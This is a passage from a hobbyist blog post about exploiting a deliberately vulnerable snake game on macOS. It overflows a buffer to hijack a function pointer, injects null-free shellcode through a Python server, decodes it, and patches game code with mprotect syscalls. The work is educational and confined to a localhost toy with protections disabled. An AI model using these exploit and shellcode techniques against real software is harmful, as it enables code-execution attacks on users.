<figure class="highlight"><pre><code class="language-x64" data-lang="x64"> __ZL10targetFunc: // targetFunc
0000000100001020 dq 0x0000000000000000 ; DATA XREF=_main+29, _main+52
0000000100001028 db 0x00 ; '.'
0000000100001029 db 0x00 ; '.'
000000010000102a db 0x00 ; '.'
000000010000102b db 0x00 ; '.'
000000010000102c db 0x00 ; '.'
000000010000102d db 0x00 ; '.'
000000010000102e db 0x00 ; '.'
000000010000102f db 0x00 ; '.'
__ZL4buff: // buff
0000000100001030 db 0x00 ; '.' ; DATA XREF=_main+36
0000000100001031 db 0x00 ; '.'
0000000100001032 db 0x00 ; '.'
0000000100001033 db 0x00 ; '.'
; (buff continues below)</code></pre></figure>
<p>Unluckily, this means that try as I might, I couldn’t use the gets() call to change the value of the targetFunc pointer. After a bit of experimentation, I found that (at least for my trivial example), Clang places variables in the bss section in the order they’re encountered in code, so rewriting the code to assign to buff before the gets() call sorted things out (example below).</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">hello</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello World</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">buff</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'c'</span><span class="p">;</span>
<span class="n">targetFunc</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buff</span><span class="p">);</span>
<span class="n">targetFunc</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Of course, all of the above only holds true if both variables are located in the same section in the executable. If, for example, targetFunc was initialized when it was declared, like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)()</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span></code></pre></figure>
<p>It would be placed in the data section of the executable instead of the bss section (since it has an initial value). This doesn’t preclude me from overflowing (I don’t think), but it does mean that I also have to worry about the order that the compiler places the bss section and the data section in the executable. This seemed like more hassle than it was worth for the purposes of this project so I just kept everything in bss all the time.</p>
<p>It seemed like the above code made it possible for a properly crafted input string to overflow and write a new address into the function pointer, so I decided to give that a shot. The address of buff in my executable was 0x0000000100001020. In order to be able to enter this value to gets(), it needed to be converted to ascii. A lot of that address is zero bytes, which don’t have an ascii character associated with it, so I had to enter them in terminal by pressing control+space instead. The non zero bytes are 01, 10, and 20, two of which are non printable characters that I ended up copy and pasting from a website so that I didn’t have to figure out how to type them. The last one, 20, is the space character (‘ ‘). In terminal, it looked like this (note the space character at the end):</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB^@^@^@^A^@^@^P </code></pre></figure>
<p>Copying and pasting the above string is not the same as actually pasting in the ascii characters for bytes 01 and 10, this is just how terminal decided to display that those characters were entered.</p>
<p>In addition to being annoying to enter, this didn’t work because I had forgotten about endianness, and needed to rearrange this input so that the address was specified as a little-endian value. Figuring that out took longer than I’m willing to admit to in a blog post. The correct string looked like this:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB ^P^@^@^A^@^@^@</code></pre></figure>
<p>Finally though, I could demonstrably (using lldb to print the address of targetFunc) use a buffer overflow to set a pointer. Sadly, if I tried the same trick without lldb attached, things failed horribly. It turns out OS X had one more security feature up it’s sleeve to stall my plan of creating the world’s most insecure application.</p>
<h2 id="aslr">A/S/L…R?</h2>
<p>ASLR, or <strong>A</strong>ddress <strong>S</strong>pace <strong>L</strong>ayout <strong>R</strong>andomization, is a security technique that rearranges the locations of key areas of an executable’s data, including (at least on OS X Mojave) the .bss section. This means that every time I ran the test application without lldb attached, the address of the character buffer was randomized.</p>
<p>The concept of ASLR was first published in 2001, and first used in a “mainstream” OS in 2003 (according to wikipedia at least). Given that the PS2 was launched in 2000, I’m relatively confident that there was nothing like this on our story’s hardware. I also found <a href="https://www.slideshare.net/gotohack/security-offense-and-defense-strategies-videogame-consoles-architecture-under-microscope">this presentation</a> about game console security which suggests that ASLR didn’t make an appearance on Sony consoles until the PS4. This means that just like before, I can feel good about simply disabling this security feature on my executable. This is accomplished by another clang flag, “-Wl,-no_pie”, where pie refers to “position indepent executables.” Unlike earlier however, this flag can be enabled in an Xcode project, you just need to go to your build settings and enable the setting “Generate Position-Dependent Executable.”</p>
<p>Compiling with that flag gave me a lovely little binary which kept the buff variable at the same memory address all the time.</p>
<h2 id="step-three-putting-things-together">Step Three: Putting Things Together</h2>
<p>Now that I was properly redirecting the targetFunc pointer to my buffer, it seemed like the next step was to actually write some code into that buffer to execute. To keep things simple, I started out by reusing the code string that called exit(42) earlier. Unfortunately, a lot of the hex values in my code string couldn’t be represented in ascii at all, so I decided to abandon using gets() and wrote a small python server to pass the code string to my program over a socket. I was going to need to do this eventually anyway so this felt like progress.</p>
<div align="center">
<img src="/images/post_images/2019-12-04/drevil.jpg" style="width:278px;height:225px;" />
<br />
</div>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">socket</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">address</span> <span class="o">=</span> <span class="p">(</span><span class="s">'localhost'</span><span class="p">,</span> <span class="mi">10002</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">bind</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
<span class="n">connection</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">accept</span><span class="p">()</span>
<span class="n">connection</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="sa">b</span><span class="s">"</span><span class="se">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x10\x00\x00\x01\x00\x00\x00</span><span class="s">"</span><span class="p">)</span></code></pre></figure>
<p>This also meant making my example program a bit more complicated:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <cstring>
#include <stdio.h>
</span>
<span class="k">static</span> <span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)();</span>
<span class="kt">void</span> <span class="nf">hello</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello World</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">buff</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">=</span><span class="sc">'c'</span><span class="p">;</span>
<span class="n">targetFunc</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">int</span> <span class="n">SERVER_PORT</span> <span class="o">=</span> <span class="mi">10002</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">SERVER_ADDRESS</span> <span class="o">=</span> <span class="s">"127.0.0.1"</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">int</span> <span class="n">BUFF_LEN</span> <span class="o">=</span> <span class="mi">64</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sockAddr</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span>
<span class="n">sockAddr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sockAddr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">SERVER_PORT</span><span class="p">);</span>
<span class="n">inet_pton</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SERVER_ADDRESS</span><span class="p">,</span> <span class="o">&</span><span class="n">sockAddr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">socketHandle</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">connect</span><span class="p">(</span><span class="n">socketHandle</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sockAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sockAddr</span><span class="p">));</span>
<span class="n">recv</span><span class="p">(</span><span class="n">socketHandle</span><span class="p">,</span> <span class="o">&</span><span class="n">buff</span><span class="p">,</span> <span class="n">BUFF_LEN</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">targetFunc</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Running this totally worked as long as I had disabled aslr. I stopped here to celebrate by becoming bored with the project and abandoning it for a month.</p>
<h2 id="modifying-existing-instructions">Modifying Existing Instructions</h2>
<p>Downloading and executing assembly code was already pretty awesome, but given that my end goal was to be able to patch a game using this system, it seemed like it would be way cooler if I could use that assembly to fix bugs in different parts of the program. I’d already used mprotect to mark pages as Read/Write protected in other project (for tracking memory stomps), so it wasn’t a huge stretch to use it to mark pages as executable instead. I still wrote a small test program to make sure it worked.</p>
<p>When running in debug, the code below will return 0 instead of 42, because it modifies the shouldExit42() function to return false. Clang will optimize away the memcpy operation if you compile above -O0, but that didn’t really matter to me because, in the real project, I was going to be hand writing the assembly to do this.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <sys/mman.h>
#include <memory>
#include <unistd.h>
#include <stdint.h>
</span>
<span class="n">bool</span> <span class="nf">shouldExit42</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">bool</span> <span class="nf">shouldNotExit42</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="kt">int64_t</span> <span class="n">pagesize</span> <span class="o">=</span> <span class="n">getpagesize</span><span class="p">();</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">should</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">shouldExit42</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">shouldNot</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">shouldNotExit42</span><span class="p">;</span>
<span class="kt">int64_t</span> <span class="n">shouldPageAddr</span> <span class="o">=</span> <span class="n">pagesize</span> <span class="o">*</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">(</span><span class="n">should</span><span class="p">)</span><span class="o">/</span><span class="n">pagesize</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">shouldPage</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">shouldPageAddr</span><span class="p">;</span>
<span class="n">mprotect</span><span class="p">(</span><span class="n">shouldPage</span><span class="p">,</span> <span class="n">pagesize</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_EXEC</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">should</span><span class="p">,</span><span class="n">shouldNot</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
<span class="k">return</span> <span class="n">shouldExit42</span><span class="p">()</span> <span class="o">?</span> <span class="mi">42</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Now, technically the above code is relying on undefined behaviour because the POSIX standard specifies that the behaviour of mprotect is undefined unless it’s operating on an mmap’d pointer, but OS X Mojave seems happy to just do what I want this way. Also, the 64 byte size in the memcpy call is total garbage that I pulled out of the air, but it was good enough for the test program.</p>
<p>One caveat to patching code this way is that any changes need to keep the target function the same size, since this won’t move around the rest of functions in memory (and I don’t even want to think about trying that). Alternatively, it’s possible to add entirely new functions, assuming there’s memory available to store it. I already kinda did this above when I stored assembly code in a buffer and executed it there, so I’m not going to belabour the point any more.</p>
<h2 id="goodbye-test-programs-hello-snake">Goodbye Test Programs, Hello Snake</h2>
<p>Finally, I felt like I knew enough to try out actually recreating the gamasutra story in a real project, and I built a small game to use as the target executable. I started out with a tile matching game that used metal for graphics, but got tired of fighting with making -allow_stack_execute work in a project that included objective-c code, so I scrapped that and built a quick snake game with ncurses. The game sucks, but that’s not really the point, so as you’re reading, you could try to pretend that I’m talking about some totally awesome AAA project instead if it helps.</p>
<div align="center">
<img src="/images/post_images/2019-12-04/snake.png" style="width:500px; height:325px;" />
<br />
</div>
<p>The (awful) code is up on github <a href="https://github.com/khalladay/InsecureSnake">here</a>. Most of it doesn’t matter, but a few bits are relevant to this blog post. First is how I’ve set up a few key static vars:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">char</span> <span class="n">eula</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">packetHandler</span><span class="p">)();</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">randomSeed</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">(</span><span class="n">eula</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">EULA_LEN</span><span class="p">);</span>
<span class="n">randomSeed</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span>
<span class="n">packetHandler</span> <span class="o">=</span> <span class="n">handleNotificationPacket</span><span class="p">;</span>
<span class="c1">//rest of code omitted</span></code></pre></figure>
<p>Clang is going to position these static variables in the bss section in the order they’re first encountered when parsing code (or at least, that’s what it did in all my tests), so any attempt to overwrite the packetHandler pointer by overflowing the eula buffer also needed to stomp on whatever value is stored in randomSeed. Part of my payload’s job was going to be making sure that the randomSeed value was set back to 42 before it got used by the game.</p>
<p>The game starts by downloading data from a server and strcpying it into the EULA buffer. Immediately after the server sends the EULA, it’s also going to send the packet that will trigger a call to the packetHandler() function. I couldn’t do squat until I got packetHandler pointed to the eula buffer, so that’s the first thing I did. This was a little trickier than the last time I used an overflow to set a pointer because now the machine code was getting strcpy’d, meaning it couldn’t contain any null bytes. Initially though, this didn’t matter, since I just wanted to set the packetHandler pointer (which was at 00000000000092b0), and being little-endian means that I only actually needed to write the value 0x92b0.</p>
<p>Put together, this initial step looked like so:</p>
<ol>
<li>Launch Snake, have it connect to the server</li>
<li>Have the server send 1024 bytes of \x01 to fill the eula buffer</li>
<li>Send 4 bytes of \x02 to fill the random seed.</li>
<li>Send another 4 bytes of \x03 to fill the padding between randomSeed and the function pointer</li>
<li>Send \xB0\x92\x00 to update the function pointer and end the string</li>
</ol>
<p>Since it’s a bit long, I won’t show the python I used to do this here, but if you’re interested, you can check it out <a href="/images/post_images/2019-12-04/Server.txt">here</a>.</p>
<p>That part was pretty easy, but once it was working, the game would immediately crash when it received the packet triggered a call to packetHandler() since there was nothing of value in the EULA buffer. This kinda sucked, so my next step was to have the EULA buffer actually do something. As a proof of concept, I started by re-purposing the exit(42) code string that I used earlier. The original code string had a few null bytes in it though, so it needed some massaging. As a refresher, here was the original bit of machine code:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05</code></pre></figure>
<p>Luckily the original code could be refactored pretty simple to work around the problem. I just added a few unnecessary math operations to avoid needing any instructions with null bytes in them:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">.text
.globl _main
_main:
mov $25400, %di
sub $25358, %di
mov $0x2, %al
shl $24, %eax
add $0x1, %al
syscall</code></pre></figure>
<p>Assembling this with as and using objdump to get me the hex bytes gave me the following, strcpy friendly, machine code:</p>
<figure class="highlight"><pre><code class="language-test" data-lang="test">\x66\xbf\x38\x63\x66\x81\xef\x0e\x63\xb0\x02\xc1\xe0\x18\x04\x01\x0f\x05</code></pre></figure>
<p>Modifying the python server script to send this was just a matter of replacing the first set of \x01 bytes with this code string, and boom, the snake game was returning the value 42 before I had a chance to accept the EULA. This was great, but it didn’t feel like my plan of rewriting assembly to avoid null bytes was going to be very scalable when I tried to do real work. The original story talked about needing to encode/decode instructions to allow null bytes to be sent, so that was my next project.</p>
<h2 id="encodingdecoding-null-bytes">Encoding/Decoding Null Bytes</h2>
<p>I don’t know if the team at Insomniac did something more fancy, but for my purposes, all I needed to do was replace all null bytes in my machine code string with 0xCD and write some assembly that walked the bytes of the eula buffer (after strcpy) instances of 0xCD with 0x00. I may have just gotten lucky, but none of the code that I wrote for the rest of this project ever had a problem with a valid 0xCD byte getting accidentally stomped by this.</p>
<p>To get the machine code string for this bit of assembly, I actually just ended up writing it as a separate program and extracting the hex bytes using <a href="https://ridiculousfish.com/hexfiend/">Hex Fiend</a></p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">.text
.globl _main
_main:
movabsq $0x1111111111111111, %rax
movabsq $0x1111111111107E26, %rcx
subq %rcx, %rax # result of sub is addr of code after decode block
mov %rax, %rdx
mov $0xFFFF, %dx
sub $0xFFFF, %dx # zero dx without getting a null in machine code
# loop starts here
cmpb $0xCD, (%rax)
jne .+6
subb $0xCD, (%rax)
# jump to here if not == 0xcd
add $0x1, %rax
add $0x1, %dx
cmp $0x3D0, %dx # 1035 bytes total, 59 bytes for bootstrap, decode next 976 bytes
jb .-21
# int $3 # uncomment to break in debugger here
ret # end bootstrap</code></pre></figure>
<p>Getting this working was a lot of trial and error (mostly because I hadn’t written much assembly before). I also got tripped up for awhile because I was originally messing with some caller save registers and not cleaning them up, which caused weird problems later. Also, I couldn’t get labels working with the code I was sending over the wire, so I was stuck with jmp-ing to addresses. Jmp-ing to an absolute address seemed to work if I provided an address in a register, but apparently conditional jumps REQUIRE a relative address, which was a pain.</p>
<p>If you’re trying something like this on your own, My standard workflow was to put a breakpoint on the eula buffer, sprinkle my assembly liberally with int $3 calls (which cause the debugger to break there), and then examine the memory of the target buffer with an lldb command like
“memory read –size 1 –format x 0x92b0 –count 1024”.</p>
<p>Despite all my complaining though, it did work once I had ironed out all the kinks, which meant it was time to actually do something interesting to the snake game.</p>
<h2 id="patching-some-code-like-a-hacker">Patching Some Code Like a Hacker</h2>
<p>The first thing I wanted to do was change some code that shipped with the game. In this case, I wanted to change the point value for hitting a target from 3 to 15. The score value for a target was hardcoded in the code snippet below, so changing it required modifying currently loaded machine code, just like I did in the sample project earlier.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="n">SnakeGame</span><span class="o">::</span><span class="n">tick</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">currentMode</span> <span class="o">==</span> <span class="n">PLAYING</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">inputMutex</span><span class="p">.</span><span class="n">lock</span><span class="p">();</span>
<span class="n">Point</span> <span class="n">newHead</span> <span class="o">=</span> <span class="p">{</span><span class="n">snakeSegments</span><span class="p">.</span><span class="n">front</span><span class="p">().</span><span class="n">x</span> <span class="o">+</span> <span class="n">velocity</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">snakeSegments</span><span class="p">.</span><span class="n">front</span><span class="p">().</span><span class="n">y</span> <span class="o">+</span> <span class="n">velocity</span><span class="p">.</span><span class="n">y</span><span class="p">};</span>
<span class="n">inputMutex</span><span class="p">.</span><span class="n">unlock</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">newHead</span><span class="p">.</span><span class="n">x</span> <span class="o">==</span> <span class="n">targetPos</span><span class="p">.</span><span class="n">x</span> <span class="o">&&</span> <span class="n">newHead</span><span class="p">.</span><span class="n">y</span> <span class="o">==</span> <span class="n">targetPos</span><span class="p">.</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">score</span><span class="o">+=</span><span class="mi">3</span><span class="p">;</span>
<span class="c1">//rest of code omitted because it isnt important</span></code></pre></figure>
<p>It was time to fire up Hopper again, this time to figure out the address of this instruction. The tick function itself is located at address 0000000000004100 (as shown below). Working from there, the first add $0x3 instruction (which turned out to be the correct one) is located at 4199.</p>
<div align="center">
<img src="/images/post_images/2019-12-04/hopper1.png" />
<br />
</div>
<p>The page that contains the tick function starts at 0000000000004000, so thats the address I’m going to feed to memcpy. On Mac, memcpy is system call 200004A, so the assembly to mark this page as PROT_READ + PROT_WRITE + PROT_EXEC looked like the following:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_markpage:
movl $0x200004A, %eax # 4A is the mprotect syscall
movabsq $0x0000000000004000, %rdi # first arg is page addr, this is the addr of tick
movq $4096, %rsi # second arg is len, we want 1 page
movq $7, %rdx # third arg is flags
syscall</code></pre></figure>
<p>If you’re unfamiliar with how system calls work on mac, you may want to read <a href="https://filippo.io/making-system-calls-from-assembly-in-mac-os-x/">this article</a>, which was extremely helpful when I was figuring all this out.</p>
<p>After marking the page as writeable, all that I needed to do was to modify the byte at address 0x000000000000419B, which was the byte containing the score value for the target that was hardcoded into the add instruction. Changing that from 3 to 15 just required a move:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_fixscore:
movabsq $0x000000000000419B, %rax # move location of score add instruction to rax
movb $0x0F, (%rax)</code></pre></figure>
<p>Similarly, I also took this time to write 42 back to our random seed variable:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_randomseed:
movabsq $0x00000000000096b0, %rax
movq $42, (%rax) # write 42 back to the random seed var</code></pre></figure>
<p>I should note that I’m providing labels in the assembly snippets above that I didn’t actually have in my assembly code, to aid readability. It’s a bit lengthy to paste right into the article, but my entire assembly payload up to this point looked like <a href="/images/post_images/2019-12-04/payloadv1.txt">this</a> (note the string of nop instructions I used to make reading lldb output easier). By now, manually changing null bytes to 0xCD in the machine code was getting tedious, so I wrote a small script to do that manually. My workflow now looked like this:</p>
<ol>
<li>Write some assembly</li>
<li>Assemble it with “as”</li>
<li>Get the machine code using Hex Fiend</li>
<li>Paste that into textedit and remove all whitespace</li>
<li>Use my script to swap null bytes for CD</li>
<li>Add the few bytes for overflowing the buffer / setting packetHandler to the end</li>
<li>Double check to make sure the resulting string was still the right size (add extra 0xCDs until it is)</li>
<li>Paste the code string into the python server</li>
<li>Run the server and the game.</li>
</ol>
<p>I probably should have combined a few more of those steps into a utility program, but it’s a bit late for that now.</p>
<p>At this point, I had successfully managed to change the score value for targets in the game, and was feeling pretty super. However, that wasn’t enough for me to be satisfied that I had actually recreated the entire gamasutra story, so there was still more work to do.</p>
<h2 id="downloading-a-real-eula">Downloading a Real EULA</h2>
<p>Up to now, when the game displayed the EULA, it ended up displaying garbage bytes, because the eula buffer contained our code string. I wanted to fix that by having the payload include instructions for downloading a real EULA string from the server. The original story also mentioned having the payload download additional data, although technically the it reads like they downloaded more machine code… I’m not going to split hairs.</p>
<p>Setting up a socket connection in assembly isn’t super exciting, given that socket(), connect(), and recvfrom() are all syscalls on OS X, so there’s nothing exotic about it really. I had so far gotten by without allocating any stack variables (and as such, needing to clean those up), so I ended up reserving the last chunk of the eula buffer to use to store the sockaddr structure I was using, but that’s about as weird as it got. I also hardcoded the values of the sockaddr struct (by writing a C program to set it up and just copying the bytes from the sockaddr struct it created) rather than calculating them the normal way to save some time. Setting all this up looked like this:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_SetUpSocket:
movl $0x2000061, %eax # 61 is socket
movq $2, %rdi # first socket arg - AF_INET
movq $1, %rsi # second socket arg - SOCK_STREAM
movq $0, %rdx # third socket arg - protocol
syscall # call socket, socket handle in eax
movq %rax, %rdi # move socket handle to ebx
movl $0x2000062, %eax # next syscall will be to connect
movabsq $0x00000000000096a1, %rsi
movb $2, (%rsi) # now write the sockaddr bytes
add $1, %rsi
movb $0x27, (%rsi)
add $1, %rsi
movb $0x15, (%rsi)
add $1, %rsi
movq $0x7f, (%rsi)
add $3, %rsi
movq $1, (%rsi)
movabsq $0x00000000000096a0, %rsi # second arg to connect is address of sockaddr struct, located in our buffer (pre-zeroed by bootstrap)
movq $16, %rdx # third arg is len of sockaddr
syscall</code></pre></figure>
<p>Since I wanted to download the new EULA string into the same buffer that the payload code currently lived, I ended up adding a huge string of NOP instructions before calling recvfrom, and limiting the size of the EULA string so that it wouldn’t stomp on instructions that still mattered. So immediately after the code above, there was a long string of 700 NOP instructions before I actually called recvfrom and then returned from the function. This last bit of assembly looked like this:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_downloadeula:
movl $0x200001D, %eax # next syscall will be to recvfrom
movabsq $0x00000000000092b0, %rsi # second arg is address of this buffer
movq $512, %rdx # third arg is len, eula will be up to 512 bytes
movq $0x0, %r10 # fourth arg is flags
movq $0x0, %r8 # fifth arg is socket ptr, use null since we have a connected socket
movq $0x0, %r9 # ignore
syscall
ret </code></pre></figure>
<p>If you’re curious, the entire source for this payload is both <a href="/images/post_images/2019-12-04/payload_final.txt">here</a> and on the <a href="https://github.com/khalladay/InsecureSnake">github project</a> that accompanies this blog post. Note that the payload code doesn’t exactly match the code string in the final python server script, since I was manually adding padding and replacing some NOPs with 0xCD, as described earlier.</p>
<p>With this payload in place, getting a proper EULA was just a matter of adding a few more lines to the server script to listen for a connection on port 100005 and send back the string when it received that connection. You can see the final server script <a href="/images/post_images/2019-12-04/ServerV3.txt">here</a> if you’re curious. Once that was working, I could send a EULA that was human readable to the client in time to hide the fact that anything nefarious was going on, and my server was able to modify compiled code using a buffer overflow. Woohoo!</p>
<div align="center">
<img src="/images/post_images/2019-12-04/victory_dance.gif" />
</div>
<h2 id="conclusion--references">Conclusion / References</h2>
<p>This was a super cool project to work on, despite it occasionally taking a turn for the very tedious. I learned a ton about areas of programming that I had never had a chance to dabbble in before, and feel like I came away from it with a better understanding of how software works in general.</p>
<p>Given how little I knew when I started this, I used a <em>ton</em> of different blog posts and articles to help get me up to speed (in addition to the ones linked explicitly above), and I wanted to list them here in case any are of interest to anyone else. So, in no specific order, here they are:</p>
<ul>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html#linex1">http://www.vividmachines.com/shellcode/shellcode.html#linex1</a></li>
<li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882</a></li>
<li><a href="https://0xrick.github.io/binary-exploitation/bof1/">https://0xrick.github.io/binary-exploitation/bof1/</a></li>
<li><a href="https://www.thegeekstuff.com/2013/06/buffer-overflow/">https://www.thegeekstuff.com/2013/06/buffer-overflow/</a></li>
<li><a href="https://securiteam.com/securityreviews/5OP0B006UQ/">https://securiteam.com/securityreviews/5OP0B006UQ/</a></li>
<li><a href="https://www.slideshare.net/gotohack/security-offense-and-defense-strategies-videogame-consoles-architecture-under-microscope">https://www.slideshare.net/gotohack/security-offense-and-defense-strategies-videogame-consoles-architecture-under-microscope</a></li>
<li><a href="https://shanetully.com/2013/12/writing-a-self-mutating-x86_64-c-program/">https://shanetully.com/2013/12/writing-a-self-mutating-x86_64-c-program/</a></li>
<li><a href="https://stackoverflow.com/questions/4812869/how-to-write-self-modifying-code-in-x86-assembly">https://stackoverflow.com/questions/4812869/how-to-write-self-modifying-code-in-x86-assembly</a></li>
<li><a href="https://stackoverflow.com/questions/50673522/10-13-high-sierra-osx-python-mprotect-always-fails-when-granting-exec-permissi">https://stackoverflow.com/questions/50673522/10-13-high-sierra-osx-python-mprotect-always-fails-when-granting-exec-permissi</a></li>
<li><a href="https://developer.apple.com/library/archive/qa/qa1788/_index.html">https://developer.apple.com/library/archive/qa/qa1788/_index.html</a></li>
